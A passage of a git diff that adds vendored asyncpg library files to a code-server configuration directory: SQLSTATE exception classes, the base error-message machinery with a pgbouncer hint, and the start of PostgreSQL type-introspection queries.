sqlstate = '40000' + + +class TransactionIntegrityConstraintViolationError(TransactionRollbackError): + sqlstate = '40002' + + +class SerializationError(TransactionRollbackError): + sqlstate = '40001' + + +class StatementCompletionUnknownError(TransactionRollbackError): + sqlstate = '40003' + + +class DeadlockDetectedError(TransactionRollbackError): + sqlstate = '40P01' + + +class SyntaxOrAccessError(_base.PostgresError): + sqlstate = '42000' + + +class PostgresSyntaxError(SyntaxOrAccessError): + sqlstate = '42601' + + +class InsufficientPrivilegeError(SyntaxOrAccessError): + sqlstate = '42501' + + +class CannotCoerceError(SyntaxOrAccessError): + sqlstate = '42846' + + +class GroupingError(SyntaxOrAccessError): + sqlstate = '42803' + + +class WindowingError(SyntaxOrAccessError): + sqlstate = '42P20' + + +class InvalidRecursionError(SyntaxOrAccessError): + sqlstate = '42P19' + + +class InvalidForeignKeyError(SyntaxOrAccessError): + sqlstate = '42830' + + +class InvalidNameError(SyntaxOrAccessError): + sqlstate = '42602' + + +class NameTooLongError(SyntaxOrAccessError): + sqlstate = '42622' + + +class ReservedNameError(SyntaxOrAccessError): + sqlstate = '42939' + + +class DatatypeMismatchError(SyntaxOrAccessError): + sqlstate = '42804' + + +class IndeterminateDatatypeError(SyntaxOrAccessError): + sqlstate = '42P18' + + +class CollationMismatchError(SyntaxOrAccessError): + sqlstate = '42P21' + + +class IndeterminateCollationError(SyntaxOrAccessError): + sqlstate = '42P22' + + +class WrongObjectTypeError(SyntaxOrAccessError): + sqlstate = '42809' + + +class GeneratedAlwaysError(SyntaxOrAccessError): + sqlstate = '428C9' + + +class UndefinedColumnError(SyntaxOrAccessError): + sqlstate = '42703' + + +class UndefinedFunctionError(SyntaxOrAccessError): + sqlstate = '42883' + + +class UndefinedTableError(SyntaxOrAccessError): + sqlstate = '42P01' + + +class UndefinedParameterError(SyntaxOrAccessError): + sqlstate = '42P02' + + +class UndefinedObjectError(SyntaxOrAccessError): + sqlstate = '42704' + + +class DuplicateColumnError(SyntaxOrAccessError): + sqlstate = '42701' + + +class DuplicateCursorError(SyntaxOrAccessError): + sqlstate = '42P03' + + +class DuplicateDatabaseError(SyntaxOrAccessError): + sqlstate = '42P04' + + +class DuplicateFunctionError(SyntaxOrAccessError): + sqlstate = '42723' + + +class DuplicatePreparedStatementError(SyntaxOrAccessError): + sqlstate = '42P05' + + +class DuplicateSchemaError(SyntaxOrAccessError): + sqlstate = '42P06' + + +class DuplicateTableError(SyntaxOrAccessError): + sqlstate = '42P07' + + +class DuplicateAliasError(SyntaxOrAccessError): + sqlstate = '42712' + + +class DuplicateObjectError(SyntaxOrAccessError): + sqlstate = '42710' + + +class AmbiguousColumnError(SyntaxOrAccessError): + sqlstate = '42702' + + +class AmbiguousFunctionError(SyntaxOrAccessError): + sqlstate = '42725' + + +class AmbiguousParameterError(SyntaxOrAccessError): + sqlstate = '42P08' + + +class AmbiguousAliasError(SyntaxOrAccessError): + sqlstate = '42P09' + + +class InvalidColumnReferenceError(SyntaxOrAccessError): + sqlstate = '42P10' + + +class InvalidColumnDefinitionError(SyntaxOrAccessError): + sqlstate = '42611' + + +class InvalidCursorDefinitionError(SyntaxOrAccessError): + sqlstate = '42P11' + + +class InvalidDatabaseDefinitionError(SyntaxOrAccessError): + sqlstate = '42P12' + + +class InvalidFunctionDefinitionError(SyntaxOrAccessError): + sqlstate = '42P13' + + +class InvalidPreparedStatementDefinitionError(SyntaxOrAccessError): + sqlstate = '42P14' + + +class InvalidSchemaDefinitionError(SyntaxOrAccessError): + sqlstate = '42P15' + + +class InvalidTableDefinitionError(SyntaxOrAccessError): + sqlstate = '42P16' + + +class InvalidObjectDefinitionError(SyntaxOrAccessError): + sqlstate = '42P17' + + +class WithCheckOptionViolationError(_base.PostgresError): + sqlstate = '44000' + + +class InsufficientResourcesError(_base.PostgresError): + sqlstate = '53000' + + +class DiskFullError(InsufficientResourcesError): + sqlstate = '53100' + + +class OutOfMemoryError(InsufficientResourcesError): + sqlstate = '53200' + + +class TooManyConnectionsError(InsufficientResourcesError): + sqlstate = '53300' + + +class ConfigurationLimitExceededError(InsufficientResourcesError): + sqlstate = '53400' + + +class ProgramLimitExceededError(_base.PostgresError): + sqlstate = '54000' + + +class StatementTooComplexError(ProgramLimitExceededError): + sqlstate = '54001' + + +class TooManyColumnsError(ProgramLimitExceededError): + sqlstate = '54011' + + +class TooManyArgumentsError(ProgramLimitExceededError): + sqlstate = '54023' + + +class ObjectNotInPrerequisiteStateError(_base.PostgresError): + sqlstate = '55000' + + +class ObjectInUseError(ObjectNotInPrerequisiteStateError): + sqlstate = '55006' + + +class CantChangeRuntimeParamError(ObjectNotInPrerequisiteStateError): + sqlstate = '55P02' + + +class LockNotAvailableError(ObjectNotInPrerequisiteStateError): + sqlstate = '55P03' + + +class UnsafeNewEnumValueUsageError(ObjectNotInPrerequisiteStateError): + sqlstate = '55P04' + + +class OperatorInterventionError(_base.PostgresError): + sqlstate = '57000' + + +class QueryCanceledError(OperatorInterventionError): + sqlstate = '57014' + + +class AdminShutdownError(OperatorInterventionError): + sqlstate = '57P01' + + +class CrashShutdownError(OperatorInterventionError): + sqlstate = '57P02' + + +class CannotConnectNowError(OperatorInterventionError): + sqlstate = '57P03' + + +class DatabaseDroppedError(OperatorInterventionError): + sqlstate = '57P04' + + +class IdleSessionTimeoutError(OperatorInterventionError): + sqlstate = '57P05' + + +class PostgresSystemError(_base.PostgresError): + sqlstate = '58000' + + +class PostgresIOError(PostgresSystemError): + sqlstate = '58030' + + +class UndefinedFileError(PostgresSystemError): + sqlstate = '58P01' + + +class DuplicateFileError(PostgresSystemError): + sqlstate = '58P02' + + +class FileNameTooLongError(PostgresSystemError): + sqlstate = '58P03' + + +class SnapshotTooOldError(_base.PostgresError): + sqlstate = '72000' + + +class ConfigFileError(_base.PostgresError): + sqlstate = 'F0000' + + +class LockFileExistsError(ConfigFileError): + sqlstate = 'F0001' + + +class FDWError(_base.PostgresError): + sqlstate = 'HV000' + + +class FDWColumnNameNotFoundError(FDWError): + sqlstate = 'HV005' + + +class FDWDynamicParameterValueNeededError(FDWError): + sqlstate = 'HV002' + + +class FDWFunctionSequenceError(FDWError): + sqlstate = 'HV010' + + +class FDWInconsistentDescriptorInformationError(FDWError): + sqlstate = 'HV021' + + +class FDWInvalidAttributeValueError(FDWError): + sqlstate = 'HV024' + + +class FDWInvalidColumnNameError(FDWError): + sqlstate = 'HV007' + + +class FDWInvalidColumnNumberError(FDWError): + sqlstate = 'HV008' + + +class FDWInvalidDataTypeError(FDWError): + sqlstate = 'HV004' + + +class FDWInvalidDataTypeDescriptorsError(FDWError): + sqlstate = 'HV006' + + +class FDWInvalidDescriptorFieldIdentifierError(FDWError): + sqlstate = 'HV091' + + +class FDWInvalidHandleError(FDWError): + sqlstate = 'HV00B' + + +class FDWInvalidOptionIndexError(FDWError): + sqlstate = 'HV00C' + + +class FDWInvalidOptionNameError(FDWError): + sqlstate = 'HV00D' + + +class FDWInvalidStringLengthOrBufferLengthError(FDWError): + sqlstate = 'HV090' + + +class FDWInvalidStringFormatError(FDWError): + sqlstate = 'HV00A' + + +class FDWInvalidUseOfNullPointerError(FDWError): + sqlstate = 'HV009' + + +class FDWTooManyHandlesError(FDWError): + sqlstate = 'HV014' + + +class FDWOutOfMemoryError(FDWError): + sqlstate = 'HV001' + + +class FDWNoSchemasError(FDWError): + sqlstate = 'HV00P' + + +class FDWOptionNameNotFoundError(FDWError): + sqlstate = 'HV00J' + + +class FDWReplyHandleError(FDWError): + sqlstate = 'HV00K' + + +class FDWSchemaNotFoundError(FDWError): + sqlstate = 'HV00Q' + + +class FDWTableNotFoundError(FDWError): + sqlstate = 'HV00R' + + +class FDWUnableToCreateExecutionError(FDWError): + sqlstate = 'HV00L' + + +class FDWUnableToCreateReplyError(FDWError): + sqlstate = 'HV00M' + + +class FDWUnableToEstablishConnectionError(FDWError): + sqlstate = 'HV00N' + + +class PLPGSQLError(_base.PostgresError): + sqlstate = 'P0000' + + +class RaiseError(PLPGSQLError): + sqlstate = 'P0001' + + +class NoDataFoundError(PLPGSQLError): + sqlstate = 'P0002' + + +class TooManyRowsError(PLPGSQLError): + sqlstate = 'P0003' + + +class AssertError(PLPGSQLError): + sqlstate = 'P0004' + + +class InternalServerError(_base.PostgresError): + sqlstate = 'XX000' + + +class DataCorruptedError(InternalServerError): + sqlstate = 'XX001' + + +class IndexCorruptedError(InternalServerError): + sqlstate = 'XX002' + + +__all__ = ( + 'ActiveSQLTransactionError', 'AdminShutdownError', + 'AmbiguousAliasError', 'AmbiguousColumnError', + 'AmbiguousFunctionError', 'AmbiguousParameterError', + 'ArraySubscriptError', 'AssertError', 'BadCopyFileFormatError', + 'BranchTransactionAlreadyActiveError', 'CannotCoerceError', + 'CannotConnectNowError', 'CantChangeRuntimeParamError', + 'CardinalityViolationError', 'CaseNotFoundError', + 'CharacterNotInRepertoireError', 'CheckViolationError', + 'ClientCannotConnectError', 'CollationMismatchError', + 'ConfigFileError', 'ConfigurationLimitExceededError', + 'ConnectionDoesNotExistError', 'ConnectionFailureError', + 'ConnectionRejectionError', 'ContainingSQLNotPermittedError', + 'CrashShutdownError', 'DataCorruptedError', 'DataError', + 'DatabaseDroppedError', 'DatatypeMismatchError', + 'DatetimeFieldOverflowError', 'DeadlockDetectedError', + 'DependentObjectsStillExistError', + 'DependentPrivilegeDescriptorsStillExistError', 'DeprecatedFeature', + 'DiagnosticsError', 'DiskFullError', 'DivisionByZeroError', + 'DuplicateAliasError', 'DuplicateColumnError', 'DuplicateCursorError', + 'DuplicateDatabaseError', 'DuplicateFileError', + 'DuplicateFunctionError', 'DuplicateJsonObjectKeyValueError', + 'DuplicateObjectError', 'DuplicatePreparedStatementError', + 'DuplicateSchemaError', 'DuplicateTableError', + 'DynamicResultSetsReturned', 'ErrorInAssignmentError', + 'EscapeCharacterConflictError', 'EventTriggerProtocolViolatedError', + 'ExclusionViolationError', 'ExternalRoutineError', + 'ExternalRoutineInvocationError', 'FDWColumnNameNotFoundError', + 'FDWDynamicParameterValueNeededError', 'FDWError', + 'FDWFunctionSequenceError', + 'FDWInconsistentDescriptorInformationError', + 'FDWInvalidAttributeValueError', 'FDWInvalidColumnNameError', + 'FDWInvalidColumnNumberError', 'FDWInvalidDataTypeDescriptorsError', + 'FDWInvalidDataTypeError', 'FDWInvalidDescriptorFieldIdentifierError', + 'FDWInvalidHandleError', 'FDWInvalidOptionIndexError', + 'FDWInvalidOptionNameError', 'FDWInvalidStringFormatError', + 'FDWInvalidStringLengthOrBufferLengthError', + 'FDWInvalidUseOfNullPointerError', 'FDWNoSchemasError', + 'FDWOptionNameNotFoundError', 'FDWOutOfMemoryError', + 'FDWReplyHandleError', 'FDWSchemaNotFoundError', + 'FDWTableNotFoundError', 'FDWTooManyHandlesError', + 'FDWUnableToCreateExecutionError', 'FDWUnableToCreateReplyError', + 'FDWUnableToEstablishConnectionError', 'FeatureNotSupportedError', + 'FileNameTooLongError', 'ForeignKeyViolationError', + 'FunctionExecutedNoReturnStatementError', 'GeneratedAlwaysError', + 'GroupingError', 'HeldCursorRequiresSameIsolationLevelError', + 'IdleInTransactionSessionTimeoutError', 'IdleSessionTimeoutError', + 'ImplicitZeroBitPadding', 'InFailedSQLTransactionError', + 'InappropriateAccessModeForBranchTransactionError', + 'InappropriateIsolationLevelForBranchTransactionError', + 'IndeterminateCollationError', 'IndeterminateDatatypeError', + 'IndexCorruptedError', 'IndicatorOverflowError', + 'InsufficientPrivilegeError', 'InsufficientResourcesError', + 'IntegrityConstraintViolationError', 'InternalServerError', + 'IntervalFieldOverflowError', 'InvalidArgumentForLogarithmError', + 'InvalidArgumentForNthValueFunctionError', + 'InvalidArgumentForNtileFunctionError', + 'InvalidArgumentForPowerFunctionError', + 'InvalidArgumentForSQLJsonDatetimeFunctionError', + 'InvalidArgumentForWidthBucketFunctionError', + 'InvalidArgumentForXqueryError', + 'InvalidAuthorizationSpecificationError', + 'InvalidBinaryRepresentationError', 'InvalidCachedStatementError', + 'InvalidCatalogNameError', 'InvalidCharacterValueForCastError', + 'InvalidColumnDefinitionError', 'InvalidColumnReferenceError', + 'InvalidCursorDefinitionError', 'InvalidCursorNameError', + 'InvalidCursorStateError', 'InvalidDatabaseDefinitionError', + 'InvalidDatetimeFormatError', 'InvalidEscapeCharacterError', + 'InvalidEscapeOctetError', 'InvalidEscapeSequenceError', + 'InvalidForeignKeyError', 'InvalidFunctionDefinitionError', + 'InvalidGrantOperationError', 'InvalidGrantorError', + 'InvalidIndicatorParameterValueError', 'InvalidJsonTextError', + 'InvalidLocatorSpecificationError', 'InvalidNameError', + 'InvalidObjectDefinitionError', 'InvalidParameterValueError', + 'InvalidPasswordError', 'InvalidPrecedingOrFollowingSizeError', + 'InvalidPreparedStatementDefinitionError', 'InvalidRecursionError', + 'InvalidRegularExpressionError', 'InvalidRoleSpecificationError', + 'InvalidRowCountInLimitClauseError', + 'InvalidRowCountInResultOffsetClauseError', + 'InvalidSQLJsonSubscriptError', 'InvalidSQLStatementNameError', + 'InvalidSavepointSpecificationError', 'InvalidSchemaDefinitionError', + 'InvalidSchemaNameError', 'InvalidSqlstateReturnedError', + 'InvalidTableDefinitionError', 'InvalidTablesampleArgumentError', + 'InvalidTablesampleRepeatError', 'InvalidTextRepresentationError', + 'InvalidTimeZoneDisplacementValueError', + 'InvalidTransactionInitiationError', 'InvalidTransactionStateError', + 'InvalidTransactionTerminationError', + 'InvalidUseOfEscapeCharacterError', 'InvalidXmlCommentError', + 'InvalidXmlContentError', 'InvalidXmlDocumentError', + 'InvalidXmlProcessingInstructionError', 'LocatorError', + 'LockFileExistsError', 'LockNotAvailableError', + 'ModifyingExternalRoutineSQLDataNotPermittedError', + 'ModifyingSQLDataNotPermittedError', 'MoreThanOneSQLJsonItemError', + 'MostSpecificTypeMismatchError', 'NameTooLongError', + 'NoActiveSQLTransactionError', + 'NoActiveSQLTransactionForBranchTransactionError', + 'NoAdditionalDynamicResultSetsReturned', 'NoData', 'NoDataFoundError', + 'NoSQLJsonItemError', 'NonNumericSQLJsonItemError', + 'NonUniqueKeysInAJsonObjectError', + 'NonstandardUseOfEscapeCharacterError', 'NotAnXmlDocumentError', + 'NotNullViolationError', 'NullValueEliminatedInSetFunction', + 'NullValueInExternalRoutineNotAllowedError', + 'NullValueNoIndicatorParameterError', 'NullValueNotAllowedError', + 'NumericValueOutOfRangeError', 'ObjectInUseError', + 'ObjectNotInPrerequisiteStateError', 'OperatorInterventionError', + 'OutOfMemoryError', 'PLPGSQLError', 'PostgresConnectionError', + 'PostgresFloatingPointError', 'PostgresIOError', + 'PostgresSyntaxError', 'PostgresSystemError', 'PostgresWarning', + 'PrivilegeNotGranted', 'PrivilegeNotRevoked', + 'ProgramLimitExceededError', + 'ProhibitedExternalRoutineSQLStatementAttemptedError', + 'ProhibitedSQLStatementAttemptedError', 'ProtocolViolationError', + 'QueryCanceledError', 'RaiseError', 'ReadOnlySQLTransactionError', + 'ReadingExternalRoutineSQLDataNotPermittedError', + 'ReadingSQLDataNotPermittedError', 'ReservedNameError', + 'RestrictViolationError', 'SQLJsonArrayNotFoundError', + 'SQLJsonItemCannotBeCastToTargetTypeError', + 'SQLJsonMemberNotFoundError', 'SQLJsonNumberNotFoundError', + 'SQLJsonObjectNotFoundError', 'SQLJsonScalarRequiredError', + 'SQLRoutineError', 'SQLStatementNotYetCompleteError', + 'SavepointError', 'SchemaAndDataStatementMixingNotSupportedError', + 'SequenceGeneratorLimitExceededError', 'SerializationError', + 'SingletonSQLJsonItemRequiredError', 'SnapshotTooOldError', + 'SrfProtocolViolatedError', + 'StackedDiagnosticsAccessedWithoutActiveHandlerError', + 'StatementCompletionUnknownError', 'StatementTooComplexError', + 'StringDataLengthMismatchError', 'StringDataRightTruncation', + 'StringDataRightTruncationError', 'SubstringError', + 'SyntaxOrAccessError', 'TooManyArgumentsError', 'TooManyColumnsError', + 'TooManyConnectionsError', 'TooManyJsonArrayElementsError', + 'TooManyJsonObjectMembersError', 'TooManyRowsError', + 'TransactionIntegrityConstraintViolationError', + 'TransactionResolutionUnknownError', 'TransactionRollbackError', + 'TransactionTimeoutError', 'TriggerProtocolViolatedError', + 'TriggeredActionError', 'TriggeredDataChangeViolationError', + 'TrimError', 'UndefinedColumnError', 'UndefinedFileError', + 'UndefinedFunctionError', 'UndefinedObjectError', + 'UndefinedParameterError', 'UndefinedTableError', + 'UniqueViolationError', 'UnsafeNewEnumValueUsageError', + 'UnterminatedCStringError', 'UntranslatableCharacterError', + 'WindowingError', 'WithCheckOptionViolationError', + 'WrongObjectTypeError', 'ZeroLengthCharacterStringError' +) + +__all__ += _base.__all__ diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/exceptions/_base.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/exceptions/_base.py new file mode 100755 index 0000000..00e9699 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/exceptions/_base.py @@ -0,0 +1,299 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +import asyncpg +import sys +import textwrap + + +__all__ = ('PostgresError', 'FatalPostgresError', 'UnknownPostgresError', + 'InterfaceError', 'InterfaceWarning', 'PostgresLogMessage', + 'ClientConfigurationError', + 'InternalClientError', 'OutdatedSchemaCacheError', 'ProtocolError', + 'UnsupportedClientFeatureError', 'TargetServerAttributeNotMatched', + 'UnsupportedServerFeatureError') + + +def _is_asyncpg_class(cls): + modname = cls.__module__ + return modname == 'asyncpg' or modname.startswith('asyncpg.') + + +class PostgresMessageMeta(type): + + _message_map = {} + _field_map = { + 'S': 'severity', + 'V': 'severity_en', + 'C': 'sqlstate', + 'M': 'message', + 'D': 'detail', + 'H': 'hint', + 'P': 'position', + 'p': 'internal_position', + 'q': 'internal_query', + 'W': 'context', + 's': 'schema_name', + 't': 'table_name', + 'c': 'column_name', + 'd': 'data_type_name', + 'n': 'constraint_name', + 'F': 'server_source_filename', + 'L': 'server_source_line', + 'R': 'server_source_function' + } + + def __new__(mcls, name, bases, dct): + cls = super().__new__(mcls, name, bases, dct) + if cls.__module__ == mcls.__module__ and name == 'PostgresMessage': + for f in mcls._field_map.values(): + setattr(cls, f, None) + + if _is_asyncpg_class(cls): + mod = sys.modules[cls.__module__] + if hasattr(mod, name): + raise RuntimeError('exception class redefinition: {}'.format( + name)) + + code = dct.get('sqlstate') + if code is not None: + existing = mcls._message_map.get(code) + if existing is not None: + raise TypeError('{} has duplicate SQLSTATE code, which is' + 'already defined by {}'.format( + name, existing.__name__)) + mcls._message_map[code] = cls + + return cls + + @classmethod + def get_message_class_for_sqlstate(mcls, code): + return mcls._message_map.get(code, UnknownPostgresError) + + +class PostgresMessage(metaclass=PostgresMessageMeta): + + @classmethod + def _get_error_class(cls, fields): + sqlstate = fields.get('C') + return type(cls).get_message_class_for_sqlstate(sqlstate) + + @classmethod + def _get_error_dict(cls, fields, query): + dct = { + 'query': query + } + + field_map = type(cls)._field_map + for k, v in fields.items(): + field = field_map.get(k) + if field: + dct[field] = v + + return dct + + @classmethod + def _make_constructor(cls, fields, query=None): + dct = cls._get_error_dict(fields, query) + + exccls = cls._get_error_class(fields) + message = dct.get('message', '') + + # PostgreSQL will raise an exception when it detects + # that the result type of the query has changed from + # when the statement was prepared. + # + # The original error is somewhat cryptic and unspecific, + # so we raise a custom subclass that is easier to handle + # and identify. + # + # Note that we specifically do not rely on the error + # message, as it is localizable. + is_icse = ( + exccls.__name__ == 'FeatureNotSupportedError' and + _is_asyncpg_class(exccls) and + dct.get('server_source_function') == 'RevalidateCachedQuery' + ) + + if is_icse: + exceptions = sys.modules[exccls.__module__] + exccls = exceptions.InvalidCachedStatementError + message = ('cached statement plan is invalid due to a database ' + 'schema or configuration change') + + is_prepared_stmt_error = ( + exccls.__name__ in ('DuplicatePreparedStatementError', + 'InvalidSQLStatementNameError') and + _is_asyncpg_class(exccls) + ) + + if is_prepared_stmt_error: + hint = dct.get('hint', '') + hint += textwrap.dedent("""\ + + NOTE: pgbouncer with pool_mode set to "transaction" or + "statement" does not support prepared statements properly. + You have two options: + + * if you are using pgbouncer for connection pooling to a + single server, switch to the connection pool functionality + provided by asyncpg, it is a much better option for this + purpose; + + * if you have no option of avoiding the use of pgbouncer, + then you can set statement_cache_size to 0 when creating + the asyncpg connection object. + """) + + dct['hint'] = hint + + return exccls, message, dct + + def as_dict(self): + dct = {} + for f in type(self)._field_map.values(): + val = getattr(self, f) + if val is not None: + dct[f] = val + return dct + + +class PostgresError(PostgresMessage, Exception): + """Base class for all Postgres errors.""" + + def __str__(self): + msg = self.args[0] + if self.detail: + msg += '\nDETAIL: {}'.format(self.detail) + if self.hint: + msg += '\nHINT: {}'.format(self.hint) + + return msg + + @classmethod + def new(cls, fields, query=None): + exccls, message, dct = cls._make_constructor(fields, query) + ex = exccls(message) + ex.__dict__.update(dct) + return ex + + +class FatalPostgresError(PostgresError): + """A fatal error that should result in server disconnection.""" + + +class UnknownPostgresError(FatalPostgresError): + """An error with an unknown SQLSTATE code.""" + + +class InterfaceMessage: + def __init__(self, *, detail=None, hint=None): + self.detail = detail + self.hint = hint + + def __str__(self): + msg = self.args[0] + if self.detail: + msg += '\nDETAIL: {}'.format(self.detail) + if self.hint: + msg += '\nHINT: {}'.format(self.hint) + + return msg + + +class InterfaceError(InterfaceMessage, Exception): + """An error caused by improper use of asyncpg API.""" + + def __init__(self, msg, *, detail=None, hint=None): + InterfaceMessage.__init__(self, detail=detail, hint=hint) + Exception.__init__(self, msg) + + def with_msg(self, msg): + return type(self)( + msg, + detail=self.detail, + hint=self.hint, + ).with_traceback( + self.__traceback__ + ) + + +class ClientConfigurationError(InterfaceError, ValueError): + """An error caused by improper client configuration.""" + + +class DataError(InterfaceError, ValueError): + """An error caused by invalid query input.""" + + +class UnsupportedClientFeatureError(InterfaceError): + """Requested feature is unsupported by asyncpg.""" + + +class UnsupportedServerFeatureError(InterfaceError): + """Requested feature is unsupported by PostgreSQL server.""" + + +class InterfaceWarning(InterfaceMessage, UserWarning): + """A warning caused by an improper use of asyncpg API.""" + + def __init__(self, msg, *, detail=None, hint=None): + InterfaceMessage.__init__(self, detail=detail, hint=hint) + UserWarning.__init__(self, msg) + + +class InternalClientError(Exception): + """All unexpected errors not classified otherwise.""" + + +class ProtocolError(InternalClientError): + """Unexpected condition in the handling of PostgreSQL protocol input.""" + + +class TargetServerAttributeNotMatched(InternalClientError): + """Could not find a host that satisfies the target attribute requirement""" + + +class OutdatedSchemaCacheError(InternalClientError): + """A value decoding error caused by a schema change before row fetching.""" + + def __init__(self, msg, *, schema=None, data_type=None, position=None): + super().__init__(msg) + self.schema_name = schema + self.data_type_name = data_type + self.position = position + + +class PostgresLogMessage(PostgresMessage): + """A base class for non-error server messages.""" + + def __str__(self): + return '{}: {}'.format(type(self).__name__, self.message) + + def __setattr__(self, name, val): + raise TypeError('instances of {} are immutable'.format( + type(self).__name__)) + + @classmethod + def new(cls, fields, query=None): + exccls, message_text, dct = cls._make_constructor(fields, query) + + if exccls is UnknownPostgresError: + exccls = PostgresLogMessage + + if exccls is PostgresLogMessage: + severity = dct.get('severity_en') or dct.get('severity') + if severity and severity.upper() == 'WARNING': + exccls = asyncpg.PostgresWarning + + if issubclass(exccls, (BaseException, Warning)): + msg = exccls(message_text) + else: + msg = exccls() + + msg.__dict__.update(dct) + return msg diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/introspection.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/introspection.py new file mode 100755 index 0000000..c3b4e60 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/introspection.py @@ -0,0 +1,296 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + +from __future__ import annotations + +import typing +from .protocol.protocol import _create_record # type: ignore + +if typing.TYPE_CHECKING: + from . import protocol + + +_TYPEINFO_13: typing.Final = '''\ + ( + SELECT + t.oid AS oid, + ns.nspname AS ns, + t.typname AS name, + t.typtype AS kind, + (CASE WHEN t.typtype = 'd' THEN + (WITH RECURSIVE typebases(oid, depth) AS ( + SELECT + t2.typbasetype AS oid, + 0 AS depth + FROM + pg_type t2 + WHERE + t2.oid = t.oid + + UNION ALL + + SELECT + t2.typbasetype AS oid, + tb.depth + 1 AS depth + FROM + pg_type t2, + typebases tb + WHERE + tb.oid = t2.oid + AND t2.typbasetype != 0 + ) SELECT oid FROM typebases ORDER BY depth DESC LIMIT 1) + + ELSE NULL + END) AS basetype, + t.typelem AS elemtype, + elem_t.typdelim AS elemdelim, + range_t.rngsubtype AS range_subtype, + (CASE WHEN t.typtype = 'c' THEN + (SELECT + array_agg(ia.atttypid ORDER BY ia.attnum) + FROM + pg_attribute ia + INNER JOIN pg_class c + ON (ia.attrelid = c.oid) + WHERE + ia.attnum > 0 AND NOT ia.attisdropped + AND c.reltype = t.oid) + + ELSE NULL + END) AS attrtypoids, + (CASE WHEN t.typtype = 'c' THEN + (SELECT + array_agg(ia.attname::text ORDER BY ia.attnum) + FROM + pg_attribute ia + INNER JOIN pg_class c + ON (ia.attrelid = c.oid) + WHERE + ia.attnum > 0 AND NOT ia.attisdropped + AND c.reltype = t.oid) + + ELSE NULL + END) AS attrnames + FROM + pg_catalog.pg_type AS t + INNER JOIN pg_catalog.pg_namespace ns ON ( + ns.oid = t.typnamespace) + LEFT JOIN pg_type elem_t ON ( + t.typlen = -1 AND + t.typelem != 0 AND + t.typelem = elem_t.oid + ) + LEFT JOIN pg_range range_t ON ( + t.oid = range_t.rngtypid + ) + ) +''' + + +INTRO_LOOKUP_TYPES_13 = '''\ +WITH RECURSIVE typeinfo_tree( + oid, ns, name, kind, basetype, elemtype, elemdelim, + range_subtype, attrtypoids, attrnames, depth) +AS ( + SELECT + ti.oid, ti.ns, ti.name, ti.kind, ti.basetype, + ti.elemtype, ti.elemdelim, ti.range_subtype, + ti.attrtypoids, ti.attrnames, 0 + FROM + {typeinfo} AS ti + WHERE + ti.oid = any($1::oid[]) + + UNION ALL + + SELECT + ti.oid, ti.ns, ti.name, ti.kind, ti.basetype, + ti.elemtype, ti.elemdelim, ti.range_subtype, + ti.attrtypoids, ti.attrnames, tt.depth + 1 + FROM + {typeinfo} ti, + typeinfo_tree tt + WHERE + (tt.elemtype IS NOT NULL AND ti.oid = tt.elemtype) + OR (tt.attrtypoids IS NOT NULL AND ti.oid = any(tt.attrtypoids)) + OR (tt.range_subtype IS NOT NULL AND ti.oid = tt.range_subtype) + OR (tt.basetype IS NOT NULL AND ti.oid = tt.basetype) +) + +SELECT DISTINCT + *, + basetype::regtype::text AS basetype_name, + elemtype::regtype::text AS elemtype_name, + range_subtype::regtype::text AS range_subtype_name +FROM + typeinfo_tree +ORDER BY + depth DESC +'''.format(typeinfo=_TYPEINFO_13) + + +_TYPEINFO: typing.Final = '''\ + ( + SELECT + t.oid AS oid, + ns.nspname AS ns, + t.typname AS name, + t.typtype AS kind, + (CASE WHEN t.typtype = 'd' THEN + (WITH RECURSIVE typebases(oid, depth) AS ( + SELECT + t2.typbasetype AS oid, + 0 AS depth + FROM + pg_type t2 + WHERE + t2.oid = t.oid + + UNION ALL + + SELECT + t2.typbasetype AS oid, + tb.depth + 1 AS depth + FROM + pg_type t2, + typebases tb + WHERE + tb.oid = t2.oid + AND t2.typbasetype != 0 + ) SELECT oid FROM typebases ORDER BY depth DESC LIMIT 1) + + ELSE NULL + END) AS basetype, + t.typelem AS elemtype, + elem_t.typdelim AS elemdelim, + COALESCE( + range_t.rngsubtype, + multirange_t.rngsubtype) AS range_subtype, + (CASE WHEN t.typtype = 'c' THEN + (SELECT + array_agg(ia.atttypid ORDER BY ia.attnum) + FROM + pg_attribute ia + INNER JOIN pg_class c + ON (ia.attrelid = c.oid) + WHERE + ia.attnum > 0 AND NOT ia.attisdropped + AND c.reltype = t.oid) + + ELSE NULL + END) AS attrtypoids, + (CASE WHEN t.typtype = 'c' THEN + (SELECT + array_agg(ia.attname::text ORDER BY ia.attnum) + FROM + pg_attribute ia + INNER JOIN pg_class c + ON (ia.attrelid = c.oid) + WHERE + ia.attnum > 0 AND NOT ia.attisdropped + AND c.reltype = t.oid) + + ELSE NULL + END) AS attrnames + FROM + pg_catalog.pg_type AS t + INNER JOIN pg_catalog.pg_namespace ns ON ( + ns.oid = t.typnamespace) + LEFT JOIN pg_type elem_t ON ( + t.typlen = -1 AND + t.typelem != 0 AND + t.typelem = elem_t.oid + ) + LEFT JOIN pg_range range_t ON ( + t.oid = range_t.rngtypid + ) + LEFT JOIN pg_range multirange_t ON ( + t.oid = multirange_t.rngmultitypid + ) + ) +''' + + +INTRO_LOOKUP_TYPES = '''\ +WITH RECURSIVE typeinfo_tree( + oid, ns, name, kind, basetype, elemtype, elemdelim, + range_subtype, attrtypoids, attrnames, depth) +AS ( + SELECT + ti.oid, ti.ns, ti.name, ti.kind, ti.basetype, + ti.elemtype, ti.elemdelim, ti.range_subtype, + ti.attrtypoids, ti.attrnames, 0 + FROM + {typeinfo} AS ti + WHERE + ti.oid = any($1::oid[]) + + UNION ALL + + SELECT + ti.oid, ti.ns, ti.name, ti.kind, ti.basetype, + ti.elemtype, ti.elemdelim, ti.range_subtype, + ti.attrtypoids, ti.attrnames, tt.depth + 1 + FROM + {typeinfo} ti, + typeinfo_tree tt + WHERE + (tt.elemtype IS NOT NULL AND ti.oid = tt.elemtype) + OR (tt.attrtypoids IS NOT NULL AND ti.oid = any(tt.attrtypoids)) + OR (tt.range_subtype IS NOT NULL AND 